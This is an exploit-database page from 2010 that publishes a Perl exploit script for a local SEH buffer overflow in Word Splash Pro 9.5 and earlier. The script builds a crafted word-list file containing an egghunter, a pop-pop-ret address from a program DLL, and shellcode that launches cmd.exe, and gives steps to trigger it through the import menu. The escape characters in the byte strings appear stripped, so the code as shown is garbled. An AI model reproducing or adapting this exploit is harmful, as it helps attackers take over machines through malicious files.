[local exploits] - Word Splash Pro <= 9.5 Buffer Overflow
Posted on 20 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Word Splash Pro <= 9.5 Buffer Overflow | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Word Splash Pro <= 9.5 Buffer Overflow by h1ch4m in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>====================================== Word Splash Pro <= 9.5 Buffer Overflow ====================================== # Exploit Title: Word Splash Pro <= 9.5 Buffer Overflow -EggHunter- # Software Link: http://www.chronasoft.com/software/wordsplashpro # Version: <= 9.5 # Tested on: Win XP SP3 French # Date: 20/12/2010 # Author: h1ch4m #Email: h1ch4m@live.fr #Home: Net-Effects.blogspot.com #Greetz : Peter Van Eeckhoutte, Exploit-Database Team, Zhir0 #Note: tested on version 9.5 & 8.3, you may have to change the address of pop pop ret according to your sp & the program version # triggering details: file->Word list->Import then click on Word List Builder button my $file = "1.wsl"; my $size = 4112; my $nseh = "xebx06x90x90"; # jump 6 bytes my $seh = pack('V', 0x01de44dc); # pop pop ret from CRDE2000.DLL my $egg = "w00tw00t"; my $egghunter = "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8". "x77x30x30x74". "x8BxFAxAFx75xEAxAFx75xE7xFFxE7"; # Shellcode : windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes - Mountassif Moad aka Stack # http://www.exploit-db.com/exploits/13510/ my $shellcode = "x8BxECx33xFFx57". "xC6x45xFCx63xC6x45". "xFDx6DxC6x45xFEx64". "xC6x45xF8x01x8D". "x45xFCx50xB8xC7x93". "xBFx77xFFxD0"; my $junk = "x90" x ($size-length($egg.$shellcode)); open($FILE,">$file"); print $FILE $egg.$shellcode.$junk.$nseh.$seh.$egghunter; close($FILE); print "File Created successfully "; sleep(1); # <a href='http://1337db.com/'>1337db.com</a> [2010-12-20]</pre></body></html>
